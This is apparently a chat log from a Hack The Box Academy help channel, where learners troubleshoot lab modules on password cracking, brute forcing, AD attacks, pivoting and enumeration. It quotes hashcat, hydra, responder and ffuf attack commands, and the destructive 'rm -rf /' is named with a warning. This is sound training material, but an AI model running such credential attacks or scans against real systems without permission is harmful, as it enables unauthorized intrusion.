Oh... it is

I just checked

Idk why I was thinking

Gotta love regex

I had my operators backwards at first though lmfao

so it is in the mut?

Yes

At least the base one if you didn't cut any as has been suggested many times in this chat lol

ok

running 'john --wordlist=mut_password.list bit1.hash'

lets see if it spits something out

It'll take a minute

But you'll probably laugh when it gives it to you

got it

but get "Not authorized to perform operation" when trying to access the mount..

Try accessing as root

¯_(ツ)_/¯

how would you do that

Have you honestly never been root on your own system?

I have and am

but stuck on how to access the mount

Are you missing the sudo on your mount command?

Idk where you're lost then bc you should be able to access it just fine if you follow the steps

Like, is it mounted, and still nothing?

maybe I'm just missing something obvious

Like if you sudo ls - la /wherever/you/mounted

When you mounted it: did you include the password

yes

Im so lost

Huh I followed the steps exactly and had no issues

Did you do the "cryptsetup" command?

Yeah following the link from above here #modules message steps exactly it worked just fine

Dm me a screenshot of your terminal and the commands you did

https://tenor.com/view/dark-souls-bonfire-light-bonfire-gif-20346592

Hi guys,

I'm stuck on the AD Enumeration & Attacks - Skills Assessment Part I.
I got the hash for the ||svc_sql|| user, and I attempted using hashcat with rockyou.txt wordlist to crack it with no success. 😥

it does crack with rockyou, what's your command?

use rockyou.txt

they did

Also make sure that you haven't got any leading white space etc wiht your hash.

hashcat -m 13100 <hashFile> /usr/share/wordlist/rockyou.txt

exactly

why for answering the question: Which kernel version is installed on the system? (Format: 1.22.3). Why do i have to use the kernal release to get it right and not the kernal version using uname -v like the question says?

-v, --kernel-version
print the kernel version

Promoted to script kiddie 🥲 is that a promotion or a reprehensible

anyone know what to do in attacking common services medium assessment

there is only dns server

and a useless pop3

Rescan it again, you will be finding a tranferring protocol

i did a full tcp scan but found only 4 ports, a dns, a ssh and pop3 and pop3/ssl

ok lemme try again thank you

you can get the service in different port number also, check it

i used nmap -p-

always do a quick scan first so you can start, and then while you're investigating those initial findings you should always run a full scan (unless the goal is to be sneaky).

i still see only 4 ports

Revert your IP and give try or try with pwnbox

revert means change the vpn or restart the machine

restart the machine

i tried yesterday and got the same 4 so imma try with pwn box thanks

the minrate is too high also combined with the -T3 i think

you can miss open ports

also disable dns discovery with -n

even on pwn box it is showing only 4

i got some domains from dns but they are not reachable

did u restart the target

oh no

oh wow i see it now thank you so much

would've wasted hours on digging lol

since when did they add this

ive seen since my beginning on the academy 2 months ago

personal vm >>>

python2 💀

read the error, the "address already in use", use a different one

Hey guys, im currently learning cybersec and I've been using Kali Linux for almost a week now. And I like it. So I got my old computer (dual core with 8gb ram) and got a new laptop(8gb ram too, but 6 core 12threads). I wanted to setup a proper secure lab/environment to learn hacking , networking, scripting and doing ctfs. So how am I set it up? And could I use the old computer I was talking about as a server for VMs? Which distro should I run as my host, on my main laptop for daily driving it and learning linux.

Considering either parrot or something else(dunno about Dailying Kali, though I prefet ksli over parrot)

oh yeah, it was a whitespace issue 🤦‍♀️

Ild love to hear your advice guys

Anyone available to assist with a module?

I am working on attacking common services in the Academy and I can not for the sake of me connect to the FTP server I have tried every method in the FTP training.

In which section, which question are you in?

Attacking Common Services Attacking FTP : What username is available for the FTP server?

What ports did you find?

I found the correct ones and tried conneting I get connection faild. I tried Netcatting also

How did you try to connect?
Show me the command you used

You can DM it to me so we don't spoil here

Hi everyone. May someone help me on File Inclusion - Automated Scanning please? When I run the command provided ||ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://http://94.237.56.76:57958/index.php?FUZZ=value'|| I get no result:

sent over

how can I enter a screenshot here?

you have to verify your account to be able to send screenshots see #welcome

Anyone aware why metasploit isn't returning any info? Just says successful but doesn't give any of the info it's supposed to according to the walkthrough.

Can someone help me here? Not irritating or spamming, pls just don't ignore this

thank you

Are you guys running these in VMs? locally or in cloud

on a VM

locally

Hi everyone. May someone help me on File Inclusion - Automated Scanning please? When I run the command provided ||ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://http//94.237.56.76:57958/index.php?FUZZ=value'|| I get no result:

Alright cool

nvm, a really silly formatting issue

http://http://

you have syntax error

OMG how dumb, thanks for your help

any time

Well, thanks for verifying at least.

Hey

Everyone

How are you all

@lusty thicket Are you running parrot?

When using Metasploit to mssql_ping an IP, it works fine on HTB pwnbox but my personal VM doesn't return any info, just says scan successful for some reason. Anyone got any ideas as to why this might be?

do you guys accept people who have never hacked before? i really want to learn

HTB Academy is a great place to start if you're a beginner

thank god

sign up on the website and start doing some modules. if you need help this is the channel to ask questions about those modules

thank you.

kali

Hi @here I am stuck on Attacking Common Services - Easy . I was able to get the username. Trying to brute force mysql with given password file also use rockyou.txt on smtp and mysql but Incase of mysqL it getting error out like connect block after some time. Can someone please point me out what I need to focus and where I am getting thing wrong 🙂 . Thank you

Hello, i've just started the "Starting point" course and i'm currently stuck on "Responder" module, the said Responder does not capture any hashes. I used the command and url 'replace with my IPs) provided on the Walktrough. I'm connected via openvpn since there was an active service on port 80 with pwnbox. I don't have any errors, just no hashes. Does anyone have an idea ?

if there is a provided password list, use it. || there are other ports you can brute force besides SMTP and MySQL ||

Hey @mossy hatch should I use default password list or rockyou ?

go to #starting-point

my bad

Hello everyone!
I need help with "Nginx Reverse Proxy & AJP" from server-side attack module. That problem (nginx: [emerg] "upstream" directive is not allowed here in /etc/nginx/conf/nginx.conf:10) occuring after adding required code to config file. I searched from google I found solution that i have to add "include /etc/nginx/conf*" line to /etc/nginx/conf file but that didn't help me. I tried both my machine and pwn box both situation I have same problem

Hey there everyone, greets!
I 've been trying to learn by fooling around with msfconsole poking on my target machine via the pwnbox.
I should be working on finding public vulnerabilities, namely for the WP Simple backUp plugin and work my way into getting the flag.
While having stuck for sometime, I thought I 'd try smth different.
So:

• I run through the msf search on Wordpress and found the WP bruteforce/user enum exploit.
• I managed to find out the username and id# on the wp-login and from that point on
• I 'm throwing whatever wordlist makes sense on the set pass-file option.
  QUESTION: It should work yes?

Never mind, I randomly found answer😅

I think it should be CVE

Sounds like you have to find it using msf right?

for the flag, yes it should be.
The question is if I 'll be able to bruteforce the wp-admin login

You don't have to use msf to brute force, wpscan better option i assume you know that tool?!

Now I know of, I 'll take some time checking this too! thnx 🙂

Hi guys, I'm a little bit lost when it's the finding bad characters on Windows Buffer overflow

I'm using the python script used in the course but my results are really different than the course

I really do not understand the py script is the same as the course

Guys I am following wireshark and sql injection course from udemy will these two enough to try ctf in HTB?

also checkout #homelab-sysadm for help with homelabs etc.

had that happen so many times.

Well you can try boxes at htb with any level of knowledge, but just sql injection won’t get you too far and having to use wireshark is probably even more rare. There are quite a few techniques you may need to know for htb boxes

Hello everyone,

Hope you're good. Need your help regarding : Active Directory Enumeration & Attacks
Session : LLMNR/NBT-NS Poisoning - from Linux
Question : Crack the hash for the previous account and submit the cleartext password as your answer.

So, I ran "||sudo responder -I ens224||" and got many NTLMv2 hashs.
I got users : ||cluster / Backupagent / wley / forend / svc_qualys / lab_adm.||

Problem : I cracked ||wley / forend and svc_qualys||
Regarding the question, I think I have to crack one left hash previsouly mentionned : ||lab_adm||
But with the following commande of hashcat, it's seems not possible to crack it : hashcat -m 5600 hash /usr/share/wordlist/rockyou.txt
How do I have to do ?

Thanks for reading

I don't think your'e asked to crack lab_adm's hash anywhere

uhmm, hey guys?

in general, not every hash you obtain can be cracked

anyone?

Saddly I tried to crack other hashes but no one could be cracked

oh alright, thanks

didnt see your message

still stuck on it :/

like I said, not every hash will crack

they're not all using weak passwords

and the module doesn't ask you to crack it either

are you using proxychains?

if so you haven't actually prefixed your xfreerdp command with it

so there will be no route to the host your trying to connect to

@naive wadi I dont have access to that channel though

read and follow #welcome

you need to link your htb account

see @hallow kiln response

what specific part are you on? If you let me know I can check my notes. Also there is a beautiful irony that you have proxy in your name and you're having issues proxying

cool let me check

but what section of that module? There's a bunch of sections?

@mossy hatch

k

are you sure .19 is who you're supposed to try and connect to? Have you double checked all of your addresses are correct?

so your jump host/pivot-host is 251 and your target that your'e trying to rdp to is .19?

what's the output when you do ipconfig on the pivot host?

okay so xfreerdp /v:10.129.79.251:8080 /u:victor /p:pass@123

proxychains?

nah, it's not a proxychains one

i'm not caught up on this.. can you actually reach the host you're connecting to

it's the netsh

ahh okay

let me check my notes

oh yeah, it's probably that, the initial command posted doesn't have the correct IP

he basically is trying to connect to a 172. host when he has actually forwarded a port to his 10. pivot host which is listening on 8080/9001

remember your forwarding port 3389 traffic to port 8080 or 9001, can't remember what you had setup

follow what ScaredGrandpa said

yeah but the point is you have mapped 9001 to 3389

so you need to xfreerdp /v:10.129.79.251:9001 /u:victor /p:pass@123

okay

your IP is wrong

well either way that's the issue

then same command with 8080

^

gtg

peace

can anyone help me with this question in splunk?

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the count of distinct computers accessed by the account name SYSTEM. Enter it as your answer.

cant find the correct synstax even with the Hint

this says the IP is 172.16.5.150 (this is what you're trying to reach), but your netsh.exe command is forwarding to 172.16.5.19

okay i need you to start from the beginning... you need to send ONE message, and show the results of xfreerdp, ipconfig from the compromised host, and the output from netsh.exe interface portproxy show v4tov4

i'm not going to keep scrolling up and down through wrong/misplaced photos and getting confused

one message with all the proper screenshots

Hello,
can somebody give me hints regarding NoSQL injection module with Skill Assesment 2 pls ?

Hello I need help on getting started on hackthebox

In Common Services / FTP - Medusa is mentioned for bruteforce. In previous sections it has been Hydra. any benchmarketing on these?

this is only for HTB Academy - if you need help with a module you'll need to specify what module/section you are on.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

idk if its improved but I hated medusa 10 years ago and Ive developed an aversion ever since my shitty 50 line ftp bruteforce python script I wrote in an evening did a better job with less false negatives.

hehe ok

I think I'll stick to Hydra then

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I guess your try for 2nd question. that is POST login page

idk why it sent that again...

Your syntax have few error, like give correct login.php and look view page-source will help you!

I recommand you to reread the material - https://academy.hackthebox.com/module/57/section/489 - Web form Brute Forcing

you won't be able to reach 172.16.5.19 so that last screenshot is supposed to error.. your first command isn't specifying the port

/v:10.129.51.233:8080

or do /port:8080

RDP by default is using 3389, but you want to connect to port 8080 so it forwards and follow what you setup with netsh.exe

i know the module teaches 8080, but i'd avoid common port numbers in the future

is the user actually, 'user'?? secondly, i don't believe i ever used :FAIL when doing that module

i'd have to redo the lab to verify if you still need help

let me redo the skill assessment, you said it's the Skill Assessment - Website?

are there problems with box on Common Services > FTP. Been trying to bruteforce for a while now, should take this long for such at simple task

hydra -L users.list -P pws.list ftp://10.129.123.220 -s 2121

user list and pws from resources

been going for 20 min +

Attacking Common Services > FTP

http-post-form "/login.php:[user]=^USER^&[pass]=^PASS^:FAIL=log-in:SUCCESS=Login:F=<form name='log-in'

1. Give - correct login.php
2. Give - correct user and pass format
3. Look page source - for the Fail string

Refer : https://academy.hackthebox.com/module/57/section/489

i respawned the target and now there is no ftp port...

lets try again

right but you set up a listener to

list on 10.129.51.233:8080 and forward to 172.16.5.19:3389. you cannot connect directly to 172.16.5.19, you're on different networks so why try. BUT you did setup a listener that you're not using

|| xfreerdp /v:10.129.51.233 /port:8080 /u:<user> /p:'<password>' ||

your problem is you were trying to connect to something you can't reach in the first place.. you setup a listener and weren't using it

haha i was just about to get back to you sorry

was jumping around the place helping others

do you understand why @rustic sage ?

don't use :FAIL and :SUCCESS, i don't believe the module even explained this?

the main format is "<login-page>:<request body>:<error message>"

and as you've probably learned, it doesn't actually have to be an error message, it can be anything on the login page (like HTML code) that won't be on the dashboard of an authenticated user. an authenticated user wouldn't see <form name='login' because they're already authenticated. this is how hydra will determine if it's successful or not

got it, only 3 respawns 🙂

no problem. feel free to reach out if you need some more help 😉

Hi, freshly joined where is the bash button 😫

bash terminal*

what OS are you using?

there should be one pinned on kali (and i believe parrotos too)... if not open the applications folders and search for it

There's many ways to find it depending on your os

I can't even do introduction, damn feels bad. It's linux

Yes but there's the pwnbox (htb's in-browser vm), parrotOS, Kali

yes

lol send a screenshot of your screen

They can't

I'm supposed to locate the bash terminal icon and click it and then type "uname -a" to find out the flavor of something

OK. Look at your screen, identify the screen. Turn your computer off and give up. (Joking)

ha ha, yesterday I did exactly that (not a joke)

You still didn't answer

I didn't understand the question

Are you using the pwnbox

Or your own vm

what's a vm?

virtual machine

Hosted through virtualbox or vmware usually

If you aren't using one of those you are probably using pwnbox

I dont mean this is a mean way. but you may not be ready for the infosec fundementals yet

HA ikr

but uhm, so I'm not sure what the answer is

Id look into setting up your own VM and look up resources on basic Linux knowledge

Not to sound mean: but how old are you?

and come back to htb academy when youve got a little more computer exp under your belt

too old for this

I just don't know any of this

Thats why I suggest coming back when youre a little more comfortable with basics

how can I get comfortable with basics? where do I learn?

Like, give it a month of practicing and learning basic Linux and VM operations

Yeah. The Fundamentals assume a fair bit of working knowledge

And Google

over the wire bandit was how i learned to work with linux

yt?

The best way to gain linux experience is by setting up your own vm and just using it for a bit and also using a guide like linux basics for hackers is a good book

Or youtube videos for free

Linux for Dummies

definitely what I need

Its a real book

and not bad tbh

God I love the {topic} for dummies books

at least the version I read a long time ago

idk if they updated it

why is this so hard

You gotta start at the basics and work your way up

Youre picking arguably the hardest field in all of computing

It's only as hard as you make it

Tbh

next to computer engineering at least

Im speaking about the heights of the field

If you keep saying it's hard then you're gonna constantly gaslight yourself into giving up

the journey from beginner to master is such a massively longer road than people give credit for

I thought that HTB was for beginners at least it asked me if I was a beginner and I did not lie about that

Ye I figured

HTB is more for intermediate users

HTB is kinda notorious for having...higher expectations about what a beginner entails

beginner in cybersec is like already a novice sysadmin/programmer

this

Try hack me is an easier one to get started with

fun...

But I would still recommend learning linux before going to try hack me

Yup

Okay

just google how to setup a VM. and research different "distros" and try installing them and learning how to use em

try several different distros even

Yup

Just because certain distros are 'common' for hacking doesn't necessarily mean you have to use it

They usually just have more preinstalled tools

from what I read a distro is a specific version of linux

is that right?

yea

You can get by just fine, for instance, with Ubuntu

more of a different flavor

^

uhm I see

I'm guessing there's also kernel

Linux is the kernel

Linux is the kernel

OH

Jinx f0x

thats why I say distro isnt quite the same as version

cause you can have diff kernal versions within the same distro lol

Learned this the hard way after signing up for oscp after a few low level certs

how does a flavor look like?

It depends

They can be radically different

You can have two distros be nearly identical and two distros that feel like utterly different OSes entirely

thats why I recommend installing and playing with several different distros

Pwnbox is a flavor, parrot, Kali, RedHat, Ubuntu

All flavors

you even get flavor of flavors 🙂

pwnbox is justa. flavor of parrot

okay that actually made me get the question of introduction right

which is a flavor of debian

yay

once I understood what a flavor was

it became ez

Well yes. But did you do it from the terminal?

yea

I opened a icon

So you did find the terminal

I guess

I opened 3 different command stuff

💀

good

clicking around shit to figure it out is good

Clicking things randomly isn't bad

get used to doing that alot

first time I opened the files stuff

I got very lost very fast

Yeah that'll happen

Think of /home/{username} as C:\users\{username}

Okay

except for the root user lul

Reading up on the linix filesystem will be useful

/root/ my beloved

/root/flag.txt

i am confused

a little trick to remember when things get confusing though is: while some linux filesystem stuff is super duper important and critical, theres other sections just because different groups of people disagreed on the best way to do it so you get a mix of em

^

oh okay

/root/ is equivalent to c:\users\Administrator

Oh that's what I saw in the bottom of the command page after I typed the uname -a command

without the last /

Also wait until you find out in linux that everything is a file

👉

everything

tough

well apart from processes, but they can come to that abstraction when they need to

files too

/proc/self 🙂

Yep

I didn't want to melt their brain but since you've brought proc into this

is it normal to try and use the firefox inside the thingy and not working?

Which is why the most common troll, and I cannot stress enough the importance of not running this command, is rm -rf /

im supposed to access some ip address

and says the connection has passed out

@fathom pendant speaks the truth do not run that

The pwnbox is limited on internet access

anything I need to do?

What section are you on?

we heard you like filesystems, so we made everything a file and put a virtual filesystem in your filesystem

Interactive section with target

As far as I know there’s security in place for that command now

Maybe on the pwnbox

And you're doing http://ip:port?

yup

is it worth it to redo two sections I have already completed in order to refresh understanding of a more advanced section? I'm doing Intro to Nmap module and I'm on last section and I have some stress over other stuff unrelated to HTB or hacking and I had a hard time figuring out the last section and I'm still having a hard time and now I think I need to refresh myself on previous two or three sections. I read the fourth to last section again and now I'm thinking of redoing the easy and medium labs. Is that a waste of time? I'm sure I can do it in a few days if I need to. Its been a week or two since I touched Academy.

Yeah use your own browser, unless you buy some cubes or subscribe, the pwnbox is hyper limited on internet access

õh

ok

heck

Remove that, it's still a spoiler

As it's literally the answer

f

Yup doesnt hurt to do review and update notes

Sometimes Ive gone back to an old section and Im abhorred about how bad my notes were and I take a solid five to ten minutes updating them

How find the password for the user mary with wevtutil

But yeah I suggest setting up your own vm, as free is limited to one spawn per day

use wevtutil to find the password, make sure youre looking for mary

Lol

my brain can't process this VM thing atm

Following the steps from the section is a good start

Thats why I said take a month off from htb to learn VMs

in windows privilege escalation Module

Okay good advice

but my brain process has other priorities atm

I believe there’s even a module for setting everything up

I had to spend so much time updating notes as my ability to take notes has gotten better the further I go through the course

There's really not a whole lot that's complicated (unless you want it to be)

yea apperantly to have a VM takes only 5 steps

i have already followed but i can't able to get the PWD for mary can anyOne help me OUT !!

6 if u count with the shutdown

yup exactly

yeah, you can get a VM up and running really quickly

I really want to spend a weekend just sitting down and totally overhauling my notes

Download VMware/virtualbox, download kali iso, create vm in either of the hypervisors, install kali

migrated to org-roam so cross linking all my notes too as I go

it's been really useful

Im doing little tweaks here and there but itd be better if I just sat down and did it all in one go. Start leveraging more advanced obsidian features too.

Step 1) identify which software you wanna use
Step 2) download the version of Linux you want
Step 3) follow installation instructions (usually give more resources than recommended minimum)
Step 4) wait

I had covid recently and actually did that.

But my weekends are booked till like mid November

Just get someone to cough into your open mouth and you can do what I did

I like the step 4

I already had to take some work off for health stuff recently so I cant afford to miss too much more atm

From what I found on google :
Step 1: Prepare your computer for Virtualization. ...
Step 2: Install Hypervisor (Virtualization Tool) ...
Step 3: Import a Virtual Machine. ...
Step 4: Start the Virtual Machine. ...
Step 5: Using the Virtual Machine. ...

fair

and 6 shut it down

i dunno where to ask this, but how can i contact academy CS, i can't get it to appear on the support chat bubble

Can anyOne plZz help me out Broh !
Get-WinEvent -LogName security | where { $.ID -eq 4688 -and $.Properties[8].Value -like '/user'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} from this i can not able to fetch the password for Mary !!!

@acoustic flame my profile specifically says to ask before DMing, and its also against the server rules to send unsolicited DMs

@thorn urchin Ook.

@thorn urchin Thats Amazing !!!

You using a pop-up blocker?

This, it does not play nice with a popup blocker

no, i see the chatbox but no idea where to actually contact CS

Messages

type some bs

robot will give a useless answer

then hit chat with agent

i dont see any way to start a message

just says no messages

when I run arp -a in my lan which im connected via wifi no other devices were found

Anybody to help with NoSQL skills assessment 2 pls ?

https://dontasktoask.com/

what's your question?

Yeah so I run arp -a in cli but the devices in terminal is not displaying only my ip and gateway shows there but I when go to the router it shows the devices and the firewalls are off

I have injection point ... I have payload because I thinks it is SSJI it is blind injection ... not sure if I need to find correct object parameter name because it looks like that e.g password is not password but smt. like pass ... I want to extract token through JS but not sure if it is good way ...

You're provided with lists in the module

Anyone able to assist with 3rd question from skill assessment on WIndows event logs?

By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe

Can anyone give a hand with DACL Attacks I "Password Abuse"? On the last question, tried a couple variations, but unable to read or download flag.

SQLMAP ESSENTIALS

skill assessment

What's the contents of table final_flag?```
I have looked in every single place on the web application and I've even used ffuf to fuzz for directories and files useing raft_large_files/directories. Can anyone please nudge me or hint me or save me please

How do I do this, new to hacking

Did you make an account

For what

For Neopets

I found this on my discord server search tab

If you want to learn how to hack. Use HTB Academy. It's a school for hacking.
http://academy.hackthebox.com

Do I have to have a computer

You can probably do it using Kali Nethunter on mobile but that is going to take a lot of effort

So yes you need a pc or laptop

Shit

You should it's really fun

well you didn’t look EVERYWHERE

best advice is || launch Burp and listen and you’ll see what you missed ||

I used Burp for each directory and file that I found. The only thing I find are API related to google maps for when you are checking out. Can you please give me any nudge towards the vector Please?

you can dm me

I'm so confused

What has confused u

then this isnt the server for you

this channel is for discussing a academy modules only and the server is for the HTB community at large. If you dont know what that is then its not a place that would appeal to you.

I joined because the description was learning

Not saying you have to leave but read #rules and #welcome and stay on channel topic

Well I don't see a general chat now do I 🤷‍♂️

Yeah because you havnt read #welcome

the server is locked off to people that havnt verified their account

Dont have an account for it

No shit

Thats why I said this server was likely not for you 😂

Either you make an account or theres nothing for you here

Be like me joining a basketball discord when I dont play basketball

Obviously

try clearing cache, logging out, and then back in?

Been having box stability issues myself on the us vpn, haven't tested the EU ones to double check if it's just me

Shouldn't be

i want to bruteforce using dnsenum but i cant because the box keeps randomly falling over

Try changing vpn region, resetting pwnbox, and resetting target

i'll try changing region

Well when you change regions you'll have to reset target

hello! i found ||ticket in Ccache shared folder|| in crackmapexec module in last questin skills assessment. it is malformed and i cant use it. is it a rabbit hole and i need to change the focus?

Did you try using it. Or are you just asking before doing

Yeah it happens (probably more than it should)

I tried. your answer helped me understand that I was doing something wrong, probably accidentally adding a byte to the ticket. rebooting the machine and reusing the ticket, as well as more careful work with the ticket (Kerberos and Impacked) = everything worked out.
maybe it’s because I’ve been studying this module for 7 hours and I’m tired). thank you

No problem, there's a handful of people that hit a wall and literally don't try anything

having trouble on Intro to Metasploit, question is to use EternalRomace. But everytime i run the exploit is says "exploit successful but no session created"

Did you set the right LHOST?

the LHOST is just some random IP and its listening on port 4444, I never specified that IP or port before tho

I am using the instance of parrot provided by HTB, not using my own machine. if that is significant in any way

Well if you're not on an attack host: LHOST will be the tun0 ip

L Stands for Listening

If it's not an ip/interface on your system it won't call back to you

It will call (unsuccessfully) to that random ip

thank you, used ifconfig and set the correct IP for LHOST, got a shell now

Fun fact in msfconsole you can do lhost=tun0 and it'll grab that interface's ip

Or whatever the command is my msf stuff is rusty lol

ahhhh okay, thats handy. thank you

Mhm

Can anyone help me with Authentication Bypass - Type Juggling in Whitebox Attacks module? This section seems relatively straight forward, just use a || magic hash || but I can't seem to get it to work.

guys any videos or write ups that i can watch or read to just know about active dirctory hacking like to understand the concept of the of the course from a to z befor going into the skills assessemeent

anysuggestions

Anyone available to compare flags for the first question on NTLM Replay Attacks - NTLMRelayx Use Cases? I have the flag from the connections.txt file, but it's not accepting the flag as the right answer.

Both of the flags. I got them from the files you supposed to, but the system will not accept the flags.

hey im doing the same lab (and thank you for the help) but im curious as which exploit do you choose?
i did search eternalblue and like 4 different options came, which one do you choose now?

(i searched for eternalblue instead of eternalromance but how'd ik to search for ms17_010 instead then 🥲 )

anyone

Have you already done the module Introduction to Active Directory already?

https://www.youtube.com/playlist?list=PL1H1sBF1VAKVoU6Q2u7BBGPsnkn-rajlp

Yes i did that

And im close to end attacking with enumeration

And i need to practice those techniques

Cuz too many things i need to see what i can do first what second if this disnt work lets try another thing i didnt want just to study like i have. Lot of information need to put theme under practice read or watch something to be more familiar with it

Maybe this one?
https://app.hackthebox.com/tracks/Active-Directory-101

Do i need more skills without the windows privileges escalation and the Active Directory?

No idea what skills you need.
At the exam you need all skills from all 28 modules and from the 12 modules which are considered as basic requirements for the path.

Thank you mate

@acoustic owl are u around

have important question

@thorn urchin ?

Just ask your question

They're less likely to answer if you don't just ask

If i use a proxy can my ip be leaked because of the WebRTC thing

That's not related to an academy module

it is

Which one?

networking i guess

"I guess"

its the networking module

pls help bro

its important

If traffic is routed through a proxy: your ip is still masked

ok so i dont have to worry about webrtc

¯_(ツ)_/¯

im talking about firefox proxy

Again not really related to any module it doesn't sound like

This sounds more like a question for #web

Like if you're that schizo about it, don't use webrtc

ok

is there any other way that can leak my ip

Brother, no one cares enough about you to steal your ip

Your IP will certainly be known at HTB through the VPN.

morning, notice the windows target for lab https://academy.hackthebox.com/module/158/section/1436 DNSCAT asked me if it can restart to upload updates now, maybe configuration err and updates should be disabled ? anyway notice target was bit slow.

Htb when they get @valid cipher s ip

Read #welcome and #rules my dude

It's a bot I think

Posted on multiple channels @fathom pendant

Or just copy/paste I didn't see their other messages and still don't lol

Yeah got deleted

So if bot, automod whacked

Lmfao

Probably

Whenever it connects to a website, or via VPN.

Go read Michael Bazzels book if you want try and be anonymous. Its probably the most comprehensive on the subject. Also The Hated One on YouTube.

Can anyone plz help me with student subscription? I signed up with my unis email but obviously not on a list. Who do I message to get it listed

@everyone

Message website support

They'll look into your email and basically chuck it on a list

Where do I find it?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Should be a green bubble at the bottom right of the screen on any academy page

but theres no option to message them for me at all

Select arbitrary article, react with sad face

I did still nothing

Try reaching out to customer support email then

It's towards the bottom of the article I linked

You can also try clearing cache and logging back in

I'm not an htb staff member, nor did I give consent to dm

There's an email in the article I linked

Hey I am stuck at Footprinting on the question: What is the customized version of the POP3 server? What do they mean with customized version? I have already answered the other questions but I am not really grasphing what they mean with customized version.

So if you connected to the pop3 server, what is the version it gives you

That's basically what it asks you

"Customized version" is another way of saying "not default"

ugh had to copy all the text not just version

Yes

I don't consider the fact that they changes some words in that banner to be part of the version

I could've also been "Peter POP3 V123"

"Some words in the banner" who's to say they didn't actually manipulate the base software code for dovecot, to be implemented for the business (hypothetically)

Yeah, im just salty atm.

Thanks though for the help

Go eat a snickers, you're not you when you're hungry

I am hungry atm lol

i ran this command nmap youtube.com -Pn --reason --top-ports=12 and got port 80 to be filtered, i ran this command nmap youtube.com -Pn --reason -p 80 and i got port 80 to be open.
w h y? ._.

(doing nmap module btw)

https://nmap.org/book/legal-issues.html

if you don't want your ISP or the popo come knocking then i suggest you stop scanning random domain that you do not have permission to scan

One message removed from a suspended account.

One message removed from a suspended account.

One message removed from a suspended account.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

waits for the request to be illegal

if it's academy related then ask here

One message removed from a suspended account.

One message removed from a suspended account.

Called it

One message removed from a suspended account.

One message removed from a suspended account.

I highly suggest reading #welcome and #rules

real the #rules because you ask something dumb

Queue "how do hack tiktok or iPhone?"

One message removed from a suspended account.

or youtube

One message removed from a suspended account.

no

She lives in Canada but she's real

One message removed from a suspended account.

Is it emma?

Wait, you know Emma from Canada?

@fading violet

Time + study = hacklord

Not really

I mean that's kinda what academy is... help to learn hacking

And thm

You can have both?

Like curiosity leads to asking questions

Not understanding answers tends to lead to wanting more help than just study on your own

¯_(ツ)_/¯

Good morning everyone

hey guys in need help. anyone finished the password attack easy lab i dont know which password list to use i used the one in the password list in the given reccouses and the mutated version but no luck

pls help ❤️

You just need a little patience.
The list used is already correct

help with a machine

anyone

or wrong area

thanks bunny

Read #welcome

but is it correct that this list has p:94044 and could take up to 3-5 hours ?

Use the list provided by the module.

not the mutated one

hmm already did no luck on ssh or ftp i dont get why

im using hydra

Hi! Im struggling with the Type Filters in the file upload attacks. Anyone can help me?

Im fuzzing the file extensions to avoid the whitelisting but everything upload properly but nothing works and executes

The password though is definitely in the base passwords.list, alongside the username in username.list

attacking ftp is faster

😉

Yes

do you know what the client side is blocking/accepting?

but it says in the qeustion to get the root password so i suppose i only use root for the username

Yes, I got my files uploaded but I can't execute them

yeh doing both at the same time ftp is always way faster ^^

That's the end goal

You must first figure out a base to start from

Examine the first target and submit the root password as the answer.

Yes

But you're not going to have the root password off the bat

ah okay

It wouldn't be a skill assessment if it was just one step

dm 🙂

true

well lets see currently running now the right brute froce

And start at ftp

i do

does it slow down the ftp when i run a ssh at the same time?

No but, ssh is gonna be fruitless

gotcha buddy

defenetly makes more sense now 1 hour for the ftp

If you just try ssh root@ip youll see why

You can use more threads for hydra btw

48 is recommended

64 can cause false negatives/positives

yeh going for the recommended dont wanna crash the machine or get negetives and do it all over again

Eh you won't crash the box

Is anyone available to help me with the Service Authentication part of the Brute Forcing module - none of the wordlists I am using seem to be working.

May I DM you?

still need help with this?

okay im in the machine used the ssh key i found now im trying to get the passwd and the shadow file to crack them but shadow file is protected cant copy read or transfer it am i missing something fam?

try privilege escalation to see if you can access shadow file

yeh tought about it but its not part of the module thats why i dont think its the way to go also ingoing connections are restricted cant transfer anything in it just out

omg

found it

keep looking around guys

Hi I am in the footprinting module snmp section I am stuck on the last question
Enumerate the custom script that is running on the system and submit its output as the answer.
I have found which script they were talking about

cat snmp_oid.txt | grep "flag"
iso.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71 = STRING: "/usr/share/flag.sh"

but I do not get what I should do from here I tried feeding this to braa but got no result

┌─[eu-academy-2]─[10.10.15.210]─[htb-ac-399878@htb-smcw0q8zqo]─[~]
└──╼ [★]$ braa /usr/share/flag.sh@10.129.155.200:161:.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71
┌─[eu-academy-2]─[10.10.15.210]─[htb-ac-399878@htb-smcw0q8zqo]─[~]
└──╼ [★]$ 

Can someone nudge me in the right direction?

iirc the answer is supposed to be a flag

Yup

You don’t need the script, you need the output

maybe try waiting a little bit in the ||snmpwalk|| output

😉

yes I know but I do not get what to do with the oid

do you really need it

😉😉

I was hoping to run the script but I dont know how

./script.sh

Just check the output

You know what flag format looks like right

https://tenor.com/view/blink-kid-sigh-ugh-mhmm-gif-15809387

Am I wrong 😆

||snmpwalk|| recursively queries oids

found it

you’re absolutely right ✅

Good

I just looked in the output file long enough

Thanks guys

You’re welcome

Ah I see you found the answer

yeh wasnt look to much around before i tried unshadowing passwd and shadow

now its time for the medium

scan shows port 22,139,445

ez

Medium is arguably a bit rougher

But these skill assessments also play on your reading comprehension a bit too

I found the assessments pretty straight-forward, just the module as a whole tedious

yeh but my approach in the module is just password attacks because seeing this "22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
